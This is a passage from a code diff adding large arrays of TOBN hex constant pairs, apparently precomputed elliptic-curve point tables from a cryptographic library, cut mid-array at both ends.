+     TOBN(0x48068e13, 0x71ac2f71), TOBN(0x83d0687b, 0x9077666f),
+     TOBN(0x6d3883b2, 0x15d02819), TOBN(0x6d0d7550, 0x40dd9a35),
+     TOBN(0x61d7cbf9, 0x1d2b469f), TOBN(0xf97b232f, 0x2efc3115),
+     TOBN(0xa551d750, 0xb24bcbc7), TOBN(0x11ea4949, 0x88a1e356),
+     TOBN(0x7669f031, 0x93cb7501), TOBN(0x595dc55e, 0xca737b8a),
+     TOBN(0xa4a319ac, 0xd837879f), TOBN(0x6fc1b49e, 0xed6b67b0),
+     TOBN(0xe3959933, 0x32f1f3af), TOBN(0x966742eb, 0x65432a2e),
+     TOBN(0x4b8dc9fe, 0xb4966228), TOBN(0x96cc6312, 0x43f43950),
+     TOBN(0x12068859, 0xc9b731ee), TOBN(0x7b948dc3, 0x56f79968),
+     TOBN(0x61e4ad32, 0xed1f8008), TOBN(0xe6c9267a, 0xd8b17538),
+     TOBN(0x1ac7c5eb, 0x857ff6fb), TOBN(0x994baaa8, 0x55f2fb10),
+     TOBN(0x84cf14e1, 0x1d248018), TOBN(0x5a39898b, 0x628ac508),
+     TOBN(0x14fde97b, 0x5fa944f5), TOBN(0xed178030, 0xd12e5ac7),
+     TOBN(0x042c2af4, 0x97e2feb4), TOBN(0xd36a42d7, 0xaebf7313),
+     TOBN(0x49d2c9eb, 0x084ffdd7), TOBN(0x9f8aa54b, 0x2ef7c76a),
+     TOBN(0x9200b7ba, 0x09895e70), TOBN(0x3bd0c66f, 0xddb7fb58),
+     TOBN(0x2d97d108, 0x78eb4cbb), TOBN(0x2d431068, 0xd84bde31),
+     TOBN(0x4b523eb7, 0x172ccd1f), TOBN(0x7323cb28, 0x30a6a892),
+     TOBN(0x97082ec0, 0xcfe153eb), TOBN(0xe97f6b6a, 0xf2aadb97),
+     TOBN(0x1d3d393e, 0xd1a83da1), TOBN(0xa6a7f9c7, 0x804b2a68),
+     TOBN(0x4a688b48, 0x2d0cb71e), TOBN(0xa9b4cc5f, 0x40585278),
+     TOBN(0x5e5db46a, 0xcb66e132), TOBN(0xf1be963a, 0x0d925880),
+     TOBN(0x944a7027, 0x0317b9e2), TOBN(0xe266f959, 0x48603d48),
+     TOBN(0x98db6673, 0x5c208899), TOBN(0x90472447, 0xa2fb18a3),
+     TOBN(0x8a966939, 0x777c619f), TOBN(0x3798142a, 0x2a3be21b),
+     TOBN(0xb4241cb1, 0x3298b343), TOBN(0xa3a14e49, 0xb44f65a1),
+     TOBN(0xc5f4d6cd, 0x3ac77acd), TOBN(0xd0288cb5, 0x52b6fc3c),
+     TOBN(0xd5cc8c2f, 0x1c040abc), TOBN(0xb675511e, 0x06bf9b4a),
+     TOBN(0xd667da37, 0x9b3aa441), TOBN(0x460d45ce, 0x51601f72),
+     TOBN(0xe2f73c69, 0x6755ff89), TOBN(0xdd3cf7e7, 0x473017e6),
+     TOBN(0x8ef5689d, 0x3cf7600d), TOBN(0x948dc4f8, 0xb1fc87b4),
+     TOBN(0xd9e9fe81, 0x4ea53299), TOBN(0x2d921ca2, 0x98eb6028),
+     TOBN(0xfaecedfd, 0x0c9803fc), TOBN(0xf38ae891, 0x4d7b4745),
+     TOBN(0xd8c5fccf, 0xc5e3a3d8), TOBN(0xbefd904c, 0x4079dfbf),
+     TOBN(0xbc6d6a58, 0xfead0197), TOBN(0x39227077, 0x695532a4),
+     TOBN(0x09e23e6d, 0xdbef42f5), TOBN(0x7e449b64, 0x480a9908),
+     TOBN(0x7b969c1a, 0xad9a2e40), TOBN(0x6231d792, 0x9591c2a4),
+     TOBN(0x87151456, 0x0f664534), TOBN(0x85ceae7c, 0x4b68f103),
+     TOBN(0xac09c4ae, 0x65578ab9), TOBN(0x33ec6868, 0xf044b10c),
+     TOBN(0x6ac4832b, 0x3a8ec1f1), TOBN(0x5509d128, 0x5847d5ef),
+     TOBN(0xf909604f, 0x763f1574), TOBN(0xb16c4303, 0xc32f63c4),
+     TOBN(0xb6ab2014, 0x7ca23cd3), TOBN(0xcaa7a5c6, 0xa391849d),
+     TOBN(0x5b0673a3, 0x75678d94), TOBN(0xc982ddd4, 0xdd303e64),
+     TOBN(0xfd7b000b, 0x5db6f971), TOBN(0xbba2cb1f, 0x6f876f92),
+     TOBN(0xc77332a3, 0x3c569426), TOBN(0xa159100c, 0x570d74f8),
+     TOBN(0xfd16847f, 0xdec67ef5), TOBN(0x742ee464, 0x233e76b7),
+     TOBN(0x0b8e4134, 0xefc2b4c8), TOBN(0xca640b86, 0x42a3e521),
+     TOBN(0x653a0190, 0x8ceb6aa9), TOBN(0x313c300c, 0x547852d5),
+     TOBN(0x24e4ab12, 0x6b237af7), TOBN(0x2ba90162, 0x8bb47af8),
+     TOBN(0x3d5e58d6, 0xa8219bb7), TOBN(0xc691d0bd, 0x1b06c57f),
+     TOBN(0x0ae4cb10, 0xd257576e), TOBN(0x3569656c, 0xd54a3dc3),
+     TOBN(0xe5ebaebd, 0x94cda03a), TOBN(0x934e82d3, 0x162bfe13),
+     TOBN(0x450ac0ba, 0xe251a0c6), TOBN(0x480b9e11, 0xdd6da526),
+     TOBN(0x00467bc5, 0x8cce08b5), TOBN(0xb636458c, 0x7f178d55),
+     TOBN(0xc5748bae, 0xa677d806), TOBN(0x2763a387, 0xdfa394eb),
+     TOBN(0xa12b448a, 0x7d3cebb6), TOBN(0xe7adda3e, 0x6f20d850),
+     TOBN(0xf63ebce5, 0x1558462c), TOBN(0x58b36143, 0x620088a8),
+     TOBN(0x8a2cc3ca, 0x4d63c0ee), TOBN(0x51233117, 0x0fe948ce),
+     TOBN(0x7463fd85, 0x222ef33b), TOBN(0xadf0c7dc, 0x7c603d6c),
+     TOBN(0x0ec32d3b, 0xfe7765e5), TOBN(0xccaab359, 0xbf380409),
+     TOBN(0xbdaa84d6, 0x8e59319c), TOBN(0xd9a4c280, 0x9c80c34d),
+     TOBN(0xa9d89488, 0xa059c142), TOBN(0x6f5ae714, 0xff0b9346),
+     TOBN(0x068f237d, 0x16fb3664), TOBN(0x5853e4c4, 0x363186ac),
+     TOBN(0xe2d87d23, 0x63c52f98), TOBN(0x2ec4a766, 0x81828876),
+     TOBN(0x47b864fa, 0xe14e7b1c), TOBN(0x0c0bc0e5, 0x69192408),
+     TOBN(0xe4d7681d, 0xb82e9f3e), TOBN(0x83200f0b, 0xdf25e13c),
+     TOBN(0x8909984c, 0x66f27280), TOBN(0x462d7b00, 0x75f73227),
+     TOBN(0xd90ba188, 0xf2651798), TOBN(0x74c6e18c, 0x36ab1c34),
+     TOBN(0xab256ea3, 0x5ef54359), TOBN(0x03466612, 0xd1aa702f),
+     TOBN(0x624d6049, 0x2ed22e91), TOBN(0x6fdfe0b5, 0x6f072822),
+     TOBN(0xeeca1115, 0x39ce2271), TOBN(0x98100a4f, 0xdb01614f),
+     TOBN(0xb6b0daa2, 0xa35c628f), TOBN(0xb6f94d2e, 0xc87e9a47),
+     TOBN(0xc6773259, 0x1d57d9ce), TOBN(0xf70bfeec, 0x03884a7b),
+     TOBN(0x5fb35ccf, 0xed2bad01), TOBN(0xa155cbe3, 0x1da6a5c7),
+     TOBN(0xc2e2594c, 0x30a92f8f), TOBN(0x649c89ce, 0x5bfafe43),
+     TOBN(0xd158667d, 0xe9ff257a), TOBN(0x9b359611, 0xf32c50ae),
+     TOBN(0x4b00b20b, 0x906014cf), TOBN(0xf3a8cfe3, 0x89bc7d3d),
+     TOBN(0x4ff23ffd, 0x248a7d06), TOBN(0x80c5bfb4, 0x878873fa),
+     TOBN(0xb7d9ad90, 0x05745981), TOBN(0x179c85db, 0x3db01994),
+     TOBN(0xba41b062, 0x61a6966c), TOBN(0x4d82d052, 0xeadce5a8),
+     TOBN(0x9e91cd3b, 0xa5e6a318), TOBN(0x47795f4f, 0x95b2dda0),
+     TOBN(0xecfd7c1f, 0xd55a897c), TOBN(0x009194ab, 0xb29110fb),
+     TOBN(0x5f0e2046, 0xe381d3b0), TOBN(0x5f3425f6, 0xa98dd291),
+     TOBN(0xbfa06687, 0x730d50da), TOBN(0x0423446c, 0x4b083b7f),
+     TOBN(0x397a247d, 0xd69d3417), TOBN(0xeb629f90, 0x387ba42a),
+     TOBN(0x1ee426cc, 0xd5cd79bf), TOBN(0x0032940b, 0x946c6e18),
+     TOBN(0x1b1e8ae0, 0x57477f58), TOBN(0xe94f7d34, 0x6d823278),
+     TOBN(0xc747cb96, 0x782ba21a), TOBN(0xc5254469, 0xf72b33a5),
+     TOBN(0x772ef6de, 0xc7f80c81), TOBN(0xd73acbfe, 0x2cd9e6b5),
+     TOBN(0x4075b5b1, 0x49ee90d9), TOBN(0x785c339a, 0xa06e9eba),
+     TOBN(0xa1030d5b, 0xabf825e0), TOBN(0xcec684c3, 0xa42931dc),
+     TOBN(0x42ab62c9, 0xc1586e63), TOBN(0x45431d66, 0x5ab43f2b),
+     TOBN(0x57c8b2c0, 0x55f7835d), TOBN(0x033da338, 0xc1b7f865),
+     TOBN(0x283c7513, 0xcaa76097), TOBN(0x0a624fa9, 0x36c83906),
+     TOBN(0x6b20afec, 0x715af2c7), TOBN(0x4b969974, 0xeba78bfd),
+     TOBN(0x220755cc, 0xd921d60e), TOBN(0x9b944e10, 0x7baeca13),
+     TOBN(0x04819d51, 0x5ded93d4), TOBN(0x9bbff86e, 0x6dddfd27),
+     TOBN(0x6b344130, 0x77adc612), TOBN(0xa7496529, 0xbbd803a0),
+     TOBN(0x1a1baaa7, 0x6d8805bd), TOBN(0xc8403902, 0x470343ad),
+     TOBN(0x39f59f66, 0x175adff1), TOBN(0x0b26d7fb, 0xb7d8c5b7),
+     TOBN(0xa875f5ce, 0x529d75e3), TOBN(0x85efc7e9, 0x41325cc2),
+     TOBN(0x21950b42, 0x1ff6acd3), TOBN(0xffe70484, 0x53dc6909),
+     TOBN(0xff4cd0b2, 0x28766127), TOBN(0xabdbe608, 0x4fb7db2b),
+     TOBN(0x837c9228, 0x5e1109e8), TOBN(0x26147d27, 0xf4645b5a),
+     TOBN(0x4d78f592, 0xf7818ed8), TOBN(0xd394077e, 0xf247fa36),
+     TOBN(0x0fb9c2d0, 0x488c171a), TOBN(0xa78bfbaa, 0x13685278),
+     TOBN(0xedfbe268, 0xd5b1fa6a), TOBN(0x0dceb8db, 0x2b7eaba7),
+     TOBN(0xbf9e8089, 0x9ae2b710), TOBN(0xefde7ae6, 0xa4449c96),
+     TOBN(0x43b7716b, 0xcc143a46), TOBN(0xd7d34194, 0xc3628c13),
+     TOBN(0x508cec1c, 0x3b3f64c9), TOBN(0xe20bc0ba, 0x1e5edf3f),
+     TOBN(0xda1deb85, 0x2f4318d4), TOBN(0xd20ebe0d, 0x5c3fa443),
+     TOBN(0x370b4ea7, 0x73241ea3), TOBN(0x61f1511c, 0x5e1a5f65),
+     TOBN(0x99a5e23d, 0x82681c62), TOBN(0xd731e383, 0xa2f54c2d),
+     TOBN(0x2692f36e, 0x83445904), TOBN(0x2e0ec469, 0xaf45f9c0),
+     TOBN(0x905a3201, 0xc67528b7), TOBN(0x88f77f34, 0xd0e5e542),
+     TOBN(0xf67a8d29, 0x5864687c), TOBN(0x23b92eae, 0x22df3562),
+     TOBN(0x5c27014b, 0x9bbec39e), TOBN(0x7ef2f226, 0x9c0f0f8d),
+     TOBN(0x97359638, 0x546c4d8d), TOBN(0x5f9c3fc4, 0x92f24679),
+     TOBN(0x912e8bed, 0xa8c8acd9), TOBN(0xec3a318d, 0x306634b0),
+     TOBN(0x80167f41, 0xc31cb264), TOBN(0x3db82f6f, 0x522113f2),
+     TOBN(0xb155bcd2, 0xdcafe197), TOBN(0xfba1da59, 0x43465283),
+     TOBN(0xa0425b8e, 0xb212cf53), TOBN(0x4f2e512e, 0xf8557c5f),
+     TOBN(0xc1286ff9, 0x25c4d56c), TOBN(0xbb8a0fea, 0xee26c851),
+     TOBN(0xc28f70d2, 0xe7d6107e), TOBN(0x7ee0c444, 0xe76265aa),
+     TOBN(0x3df277a4, 0x1d1936b1), TOBN(0x1a556e3f, 0xea9595eb),
+     TOBN(0x258bbbf9, 0xe7305683), TOBN(0x31eea5bf, 0x07ef5be6),
+     TOBN(0x0deb0e4a, 0x46c814c1), TOBN(0x5cee8449, 0xa7b730dd),
+     TOBN(0xeab495c5, 0xa0182bde), TOBN(0xee759f87, 0x9e27a6b4),
+     TOBN(0xc2cf6a68, 0x80e518ca), TOBN(0x25e8013f, 0xf14cf3f4),
+     TOBN(0x8fc44140, 0x7e8d7a14), TOBN(0xbb1ff3ca, 0x9556f36a),
+     TOBN(0x6a844385, 0x14600044), TOBN(0xba3f0c4a, 0x7451ae63),
+     TOBN(0xdfcac25b, 0x1f9af32a), TOBN(0x01e0db86, 0xb1f2214b),
+     TOBN(0x4e9a5bc2, 0xa4b596ac), TOBN(0x83927681, 0x026c2c08),
+     TOBN(0x3ec832e7, 0x7acaca28), TOBN(0x1bfeea57, 0xc7385b29),
+     TOBN(0x068212e3, 0xfd1eaf38), TOBN(0xc1329830, 0x6acf8ccc),
+     TOBN(0xb909f2db, 0x2aac9e59), TOBN(0x5748060d, 0xb661782a),
+     TOBN(0xc5ab2632, 0xc79b7a01), TOBN(0xda44c6c6, 0x00017626),
+     TOBN(0xf26c00e8, 0xa7ea82f0), TOBN(0x99cac80d, 0xe4299aaf),
+     TOBN(0xd66fe3b6, 0x7ed78be1), TOBN(0x305f725f, 0x648d02cd),
+     TOBN(0x33ed1bc4, 0x623fb21b), TOBN(0xfa70533e, 0x7a6319ad),
+     TOBN(0x17ab562d, 0xbe5ffb3e), TOBN(0x06374994, 0x56674741),
+     TOBN(0x69d44ed6, 0x5c46aa8e), TOBN(0x2100d5d3, 0xa8d063d1),
+     TOBN(0xcb9727ea, 0xa2d17c36), TOBN(0x4c2bab1b, 0x8add53b7),
+     TOBN(0xa084e90c, 0x15426704), TOBN(0x778afcd3, 0xa837ebea),
+     TOBN(0x6651f701, 0x7ce477f8), TOBN(0xa0624998, 0x46fb7a8b),
+     TOBN(0xdc1e6828, 0xed8a6e19), TOBN(0x33fc2336, 0x4189d9c7),
+     TOBN(0x026f8fe2, 0x671c39bc), TOBN(0xd40c4ccd, 0xbc6f9915),
+     TOBN(0xafa135bb, 0xf80e75ca), TOBN(0x12c651a0, 0x22adff2c),
+     TOBN(0xc40a04bd, 0x4f51ad96), TOBN(0x04820109, 0xbbe4e832),
+     TOBN(0x3667eb1a, 0x7f4c04cc), TOBN(0x59556621, 0xa9404f84),
+     TOBN(0x71cdf653, 0x7eceb50a), TOBN(0x994a44a6, 0x9b8335fa),
+     TOBN(0xd7faf819, 0xdbeb9b69), TOBN(0x473c5680, 0xeed4350d),
+     TOBN(0xb6658466, 0xda44bba2), TOBN(0x0d1bc780, 0x872bdbf3),
+     TOBN(0xe535f175, 0xa1962f91), TOBN(0x6ed7e061, 0xed58f5a7),
+     TOBN(0x177aa4c0, 0x2089a233), TOBN(0x0dbcb03a, 0xe539b413),
+     TOBN(0xe3dc424e, 0xbb32e38e), TOBN(0x6472e5ef, 0x6806701e),
+     TOBN(0xdd47ff98, 0x814be9ee), TOBN(0x6b60cfff, 0x35ace009),
+     TOBN(0xb8d3d931, 0x9ff91fe5), TOBN(0x039c4800, 0xf0518eed),
+     TOBN(0x95c37632, 0x9182cb26), TOBN(0x0763a434, 0x82fc568d),
+     TOBN(0x707c04d5, 0x383e76ba), TOBN(0xac98b930, 0x824e8197),
+     TOBN(0x92bf7c8f, 0x91230de0), TOBN(0x90876a01, 0x40959b70),
+     TOBN(0xdb6d96f3, 0x05968b80), TOBN(0x380a0913, 0x089f73b9),
+     TOBN(0x7da70b83, 0xc2c61e01), TOBN(0x95fb8394, 0x569b38c7),
+     TOBN(0x9a3c6512, 0x80edfe2f), TOBN(0x8f726bb9, 0x8faeaf82),
+     TOBN(0x8010a4a0, 0x78424bf8), TOBN(0x29672044, 0x0e844970)}
+    ,
+    {TOBN(0x63c5cb81, 0x7a2ad62a), TOBN(0x7ef2b6b9, 0xac62ff54),
+     TOBN(0x3749bba4, 0xb3ad9db5), TOBN(0xad311f2c, 0x46d5a617),
+     TOBN(0xb77a8087, 0xc2ff3b6d), TOBN(0xb46feaf3, 0x367834ff),
+     TOBN(0xf8aa266d, 0x75d6b138), TOBN(0xfa38d320, 0xec008188),
+     TOBN(0x486d8ffa, 0x696946fc), TOBN(0x50fbc6d8, 0xb9cba56d),
+     TOBN(0x7e3d423e, 0x90f35a15), TOBN(0x7c3da195, 0xc0dd962c),
+     TOBN(0xe673fdb0, 0x3cfd5d8b), TOBN(0x0704b7c2, 0x889dfca5),
+     TOBN(0xf6ce581f, 0xf52305aa), TOBN(0x399d49eb, 0x914d5e53),
+     TOBN(0x380a496d, 0x6ec293cd), TOBN(0x733dbda7, 0x8e7051f5),
+     TOBN(0x037e388d, 0xb849140a), TOBN(0xee4b32b0, 0x5946dbf6),
+     TOBN(0xb1c4fda9, 0xcae368d1), TOBN(0x5001a7b0, 0xfdb0b2f3),
+     TOBN(0x6df59374, 0x2e3ac46e), TOBN(0x4af675f2, 0x39b3e656),
+     TOBN(0x44e38110, 0x39949296), TOBN(0x5b63827b, 0x361db1b5),
+     TOBN(0x3e5323ed, 0x206eaff5), TOBN(0x942370d2, 0xc21f4290),
+     TOBN(0xf2caaf2e, 0xe0d985a1), TOBN(0x192cc64b, 0x7239846d),
+     TOBN(0x7c0b8f47, 0xae6312f8), TOBN(0x7dc61f91, 0x96620108),
+     TOBN(0xb830fb5b, 0xc2da7de9), TOBN(0xd0e643df, 0x0ff8d3be),
+     TOBN(0x31ee77ba, 0x188a9641), TOBN(0x4e8aa3aa, 0xbcf6d502),
+     TOBN(0xf9fb6532, 0x9a49110f), TOBN(0xd18317f6, 0x2dd6b220),
+     TOBN(0x7e3ced41, 0x52c3ea5a), TOBN(0x0d296a14, 0x7d579c4a),
+     TOBN(0x35d6a53e, 0xed4c3717), TOBN(0x9f8240cf, 0x3d0ed2a3),
+     TOBN(0x8c0d4d05, 0xe5543aa5), TOBN(0x45d5bbfb, 0xdd33b4b4),
+     TOBN(0xfa04cc73, 0x137fd28e), TOBN(0x862ac6ef, 0xc73b3ffd),
+     TOBN(0x403ff9f5, 0x31f51ef2), TOBN(0x34d5e0fc, 0xbc73f5a2),
+     TOBN(0xf2526820, 0x08913f4f), TOBN(0xea20ed61, 0xeac93d95),
+     TOBN(0x51ed38b4, 0x6ca6b26c), TOBN(0x8662dcbc, 0xea4327b0),
+     TOBN(0x6daf295c, 0x725d2aaa), TOBN(0xbad2752f, 0x8e52dcda),
+     TOBN(0x2210e721, 0x0b17dacc), TOBN(0xa37f7912, 0xd51e8232),
+     TOBN(0x4f7081e1, 0x44cc3add), TOBN(0xd5ffa1d6, 0x87be82cf),
+     TOBN(0x89890b6c, 0x0edd6472), TOBN(0xada26e1a, 0x3ed17863),
+     TOBN(0x276f2715, 0x63483caa), TOBN(0xe6924cd9, 0x2f6077fd),
+     TOBN(0x05a7fe98, 0x0a466e3c), TOBN(0xf1c794b0, 0xb1902d1f),
+     TOBN(0xe5213688, 0x82a8042c), TOBN(0xd931cfaf, 0xcd278298),
+     TOBN(0x069a0ae0, 0xf597a740), TOBN(0x0adbb3f3, 0xeb59107c),
+     TOBN(0x983e951e, 0x5eaa8eb8), TOBN(0xe663a8b5, 0x11b48e78),
+     TOBN(0x1631cc0d, 0x8a03f2c5), TOBN(0x7577c11e, 0x11e271e2),
+     TOBN(0x33b2385c, 0x08369a90), TOBN(0x2990c59b, 0x190eb4f8),
+     TOBN(0x819a6145, 0xc68eac80), TOBN(0x7a786d62, 0x2ec4a014),
+     TOBN(0x33faadbe, 0x20ac3a8d), TOBN(0x31a21781, 0x5aba2d30),
+     TOBN(0x209d2742, 0xdba4f565), TOBN(0xdb2ce9e3, 0x55aa0fbb),
+     TOBN(0x8cef334b, 0x168984df), TOBN(0xe81dce17, 0x33879638),
+     TOBN(0xf6e6949c, 0x263720f0), TOBN(0x5c56feaf, 0xf593cbec),
+     TOBN(0x8bff5601, 0xfde58c84), TOBN(0x74e24117, 0x2eccb314),
+     TOBN(0xbcf01b61, 0x4c9a8a78), TOBN(0xa233e35e, 0x544c9868),
+     TOBN(0xb3156bf3, 0x8bd7aff1), TOBN(0x1b5ee4cb, 0x1d81b146),
+     TOBN(0x7ba1ac41, 0xd628a915), TOBN(0x8f3a8f9c, 0xfd89699e),
+     TOBN(0x7329b9c9, 0xa0748be7), TOBN(0x1d391c95, 0xa92e621f),
+     TOBN(0xe51e6b21, 0x4d10a837), TOBN(0xd255f53a, 0x4947b435),
+     TOBN(0x07669e04, 0xf1788ee3), TOBN(0xc14f27af, 0xa86938a2),
+     TOBN(0x8b47a334, 0xe93a01c0), TOBN(0xff627438, 0xd9366808),
+     TOBN(0x7a0985d8, 0xca2a5965), TOBN(0x3d9a5542, 0xd6e9b9b3),
+     TOBN(0xc23eb80b, 0x4cf972e8), TOBN(0x5c1c33bb, 0x4fdf72fd),
+     TOBN(0x0c4a58d4, 0x74a86108), TOBN(0xf8048a8f, 0xee4c5d90),
+     TOBN(0xe3c7c924, 0xe86d4c80), TOBN(0x28c889de, 0x056a1e60),
+     TOBN(0x57e2662e, 0xb214a040), TOBN(0xe8c48e98, 0x37e10347),
+     TOBN(0x87742862, 0x80ac748a), TOBN(0xf1c24022, 0x186b06f2),
+     TOBN(0xac2dd4c3, 0x5f74040a), TOBN(0x409aeb71, 0xfceac957),
+     TOBN(0x4fbad782, 0x55c4ec23), TOBN(0xb359ed61, 0x8a7b76ec),
+     TOBN(0x12744926, 0xed6f4a60), TOBN(0xe21e8d7f, 0x4b912de3),
+     TOBN(0xe2575a59, 0xfc705a59), TOBN(0x72f1d4de, 0xed2dbc0e),
+     TOBN(0x3d2b24b9, 0xeb7926b8), TOBN(0xbff88cb3, 0xcdbe5509),
+     TOBN(0xd0f399af, 0xe4dd640b), TOBN(0x3c5fe130, 0x2f76ed45),
+     TOBN(0x6f3562f4, 0x3764fb3d), TOBN(0x7b5af318, 0x3151b62d),
+     TOBN(0xd5bd0bc7, 0xd79ce5f3), TOBN(0xfdaf6b20, 0xec66890f),
+     TOBN(0x735c67ec, 0x6063540c), TOBN(0x50b259c2, 0xe5f9cb8f),
+     TOBN(0xb8734f9a, 0x3f99c6ab), TOBN(0xf8cc13d5, 0xa3a7bc85),
+     TOBN(0x80c1b305, 0xc5217659), TOBN(0xfe5364d4, 0x4ec12a54),
+     TOBN(0xbd87045e, 0x681345fe), TOBN(0x7f8efeb1, 0x582f897f),
+     TOBN(0xe8cbf1e5, 0xd5923359), TOBN(0xdb0cea9d, 0x539b9fb0),
+     TOBN(0x0c5b34cf, 0x49859b98), TOBN(0x5e583c56, 0xa4403cc6),
+     TOBN(0x11fc1a2d, 0xd48185b7), TOBN(0xc93fbc7e, 0x6e521787),
+     TOBN(0x47e7a058, 0x05105b8b), TOBN(0x7b4d4d58, 0xdb8260c8),
+     TOBN(0xe33930b0, 0x46eb842a), TOBN(0x8e844a9a, 0x7bdae56d),
+     TOBN(0x34ef3a9e, 0x13f7fdfc), TOBN(0xb3768f82, 0x636ca176),
+     TOBN(0x2821f4e0, 0x4e09e61c), TOBN(0x414dc3a1, 0xa0c7cddc),
+     TOBN(0xd5379437, 0x54945fcd), TOBN(0x151b6eef, 0xb3555ff1),
+     TOBN(0xb31bd613, 0x6339c083), TOBN(0x39ff8155, 0xdfb64701),
+     TOBN(0x7c3388d2, 0xe29604ab), TOBN(0x1e19084b, 0xa6b10442),
+     TOBN(0x17cf54c0, 0xeccd47ef), TOBN(0x89693385, 0x4a5dfb30),
+     TOBN(0x69d023fb, 0x47daf9f6), TOBN(0x9222840b, 0x7d91d959),
+     TOBN(0x439108f5, 0x803bac62), TOBN(0x0b7dd91d, 0x379bd45f),
+     TOBN(0xd651e827, 0xca63c581), TOBN(0x5c5d75f6, 0x509c104f),
+     TOBN(0x7d5fc738, 0x1f2dc308), TOBN(0x20faa7bf, 0xd98454be),
+     TOBN(0x95374bee, 0xa517b031), TOBN(0xf036b9b1, 0x642692ac),
+     TOBN(0xc5106109, 0x39842194), TOBN(0xb7e2353e, 0x49d05295),
+     TOBN(0xfc8c1d5c, 0xefb42ee0), TOBN(0xe04884eb, 0x08ce811c),
+     TOBN(0xf1f75d81, 0x7419f40e), TOBN(0x5b0ac162, 0xa995c241),
+     TOBN(0x120921bb, 0xc4c55646), TOBN(0x713520c2, 0x8d33cf97),
+     TOBN(0xb4a65a5c, 0xe98c5100), TOBN(0x6cec871d, 0x2ddd0f5a),
+     TOBN(0x251f0b7f, 0x9ba2e78b), TOBN(0x224a8434, 0xce3a2a5f),
+     TOBN(0x26827f61, 0x25f5c46f), TOBN(0x6a22bedc, 0x48545ec0),
+     TOBN(0x25ae5fa0, 0xb1bb5cdc), TOBN(0xd693682f, 0xfcb9b98f),
+     TOBN(0x32027fe8, 0x91e5d7d3), TOBN(0xf14b7d17, 0x73a07678),
+     TOBN(0xf88497b3, 0xc0dfdd61), TOBN(0xf7c2eec0, 0x2a8c4f48),
+     TOBN(0xaa5573f4, 0x3756e621), TOBN(0xc013a240, 0x1825b948),
+     TOBN(0x1c03b345, 0x63878572), TOBN(0xa0472bea, 0x653a4184),
+     TOBN(0xf4222e27, 0x0ac69a80), TOBN(0x34096d25, 0xf51e54f6),
+     TOBN(0x00a648cb, 0x8fffa591), TOBN(0x4e87acdc, 0x69b6527f),
+     TOBN(0x0575e037, 0xe285ccb4), TOBN(0x188089e4, 0x50ddcf52),
+     TOBN(0xaa96c9a8, 0x870ff719), TOBN(0x74a56cd8, 0x1fc7e369),
+     TOBN(0x41d04ee2, 0x1726931a), TOBN(0x0bbbb2c8, 0x3660ecfd),
+     TOBN(0xa6ef6de5, 0x24818e18), TOBN(0xe421cc51, 0xe7d57887),
+     TOBN(0xf127d208, 0xbea87be6), TOBN(0x16a475d3, 0xb1cdd682),
+     TOBN(0x9db1b684, 0x439b63f7), TOBN(0x5359b3db, 0xf0f113b6),
+     TOBN(0xdfccf1de, 0x8bf06e31), TOBN(0x1fdf8f44, 0xdd383901),
+     TOBN(0x10775cad, 0x5017e7d2), TOBN(0xdfc3a597, 0x58d11eef),
+     TOBN(0x6ec9c8a0, 0xb1ecff10), TOBN(0xee6ed6cc, 0x28400549),
+     TOBN(0xb5ad7bae, 0x1b4f8d73), TOBN(0x61b4f11d, 0xe00aaab9),
+     TOBN(0x7b32d69b, 0xd4eff2d7), TOBN(0x88ae6771, 0x4288b60f),
+     TOBN(0x159461b4, 0x37a1e723), TOBN(0x1f3d4789, 0x570aae8c),
+     TOBN(0x869118c0, 0x7f9871da), TOBN(0x35fbda78, 0xf635e278),
+     TOBN(0x738f3641, 0xe1541dac), TOBN(0x6794b13a, 0xc0dae45f),
+     TOBN(0x065064ac, 0x09cc0917), TOBN(0x27c53729, 0xc68540fd),
+     TOBN(0x0d2d4c8e, 0xef227671), TOBN(0xd23a9f80, 0xa1785a04),
+     TOBN(0x98c59528, 0x52650359), TOBN(0xfa09ad01, 0x74a1acad),
+     TOBN(0x082d5a29, 0x0b55bf5c), TOBN(0xa40f1c67, 0x419b8084),
+     TOBN(0x3a5c752e, 0xdcc18770), TOBN(0x4baf1f2f, 0x8825c3a5),
+     TOBN(0xebd63f74, 0x21b153ed), TOBN(0xa2383e47, 0xb2f64723),
+     TOBN(0xe7bf620a, 0x2646d19a), TOBN(0x56cb44ec, 0x03c83ffd),
+     TOBN(0xaf7267c9, 0x4f6be9f1), TOBN(0x8b2dfd7b, 0xc06bb5e9),
+     TOBN(0xb87072f2, 0xa672c5c7), TOBN(0xeacb11c8, 0x0d53c5e2),
+     TOBN(0x22dac29d, 0xff435932), TOBN(0x37bdb99d, 0x4408693c),
+     TOBN(0xf6e62fb6, 0x2899c20f), TOBN(0x3535d512, 0x447ece24),
+     TOBN(0xfbdc6b88, 0xff577ce3), TOBN(0x726693bd, 0x190575f2),
+     TOBN(0x6772b0e5, 0xab4b35a2), TOBN(0x1d8b6001, 0xf5eeaacf),
+     TOBN(0x728f7ce4, 0x795b9580), TOBN(0x4a20ed2a, 0x41fb81da),
+     TOBN(0x9f685cd4, 0x4fec01e6), TOBN(0x3ed7ddcc, 0xa7ff50ad),
+     TOBN(0x460fd264, 0x0c2d97fd), TOBN(0x3a241426, 0xeb82f4f9),
+     TOBN(0x17d1df2c, 0x6a8ea820), TOBN(0xb2b50d3b, 0xf22cc254),
+     TOBN(0x03856cba, 0xb7291426), TOBN(0x87fd26ae, 0x04f5ee39),
+     TOBN(0x9cb696cc, 0x02bee4ba), TOBN(0x53121804, 0x06820fd6),
+     TOBN(0xa5dfc269, 0x0212e985), TOBN(0x666f7ffa, 0x160f9a09),
+     TOBN(0xc503cd33, 0xbccd9617), TOBN(0x365dede4, 0xba7730a3),
+     TOBN(0x798c6355, 0x5ddb0786), TOBN(0xa6c3200e, 0xfc9cd3bc),
+     TOBN(0x060ffb2c, 0xe5e35efd), TOBN(0x99a4e25b, 0x5555a1c1),
+     TOBN(0x11d95375, 0xf70b3751), TOBN(0x0a57354a, 0x160e1bf6),
+     TOBN(0xecb3ae4b, 0xf8e4b065), TOBN(0x07a834c4, 0x2e53022b),
+     TOBN(0x1cd300b3, 0x8692ed96), TOBN(0x16a6f792, 0x61ee14ec),
+     TOBN(0x8f1063c6, 0x6a8649ed), TOBN(0xfbcdfcfe, 0x869f3e14),
+     TOBN(0x2cfb97c1, 0x00a7b3ec), TOBN(0xcea49b3c, 0x7130c2f1),
+     TOBN(0x462d044f, 0xe9d96488), TOBN(0x4b53d52e, 0x8182a0c1),
+     TOBN(0x84b6ddd3, 0x0391e9e9), TOBN(0x80ab7b48, 0xb1741a09),
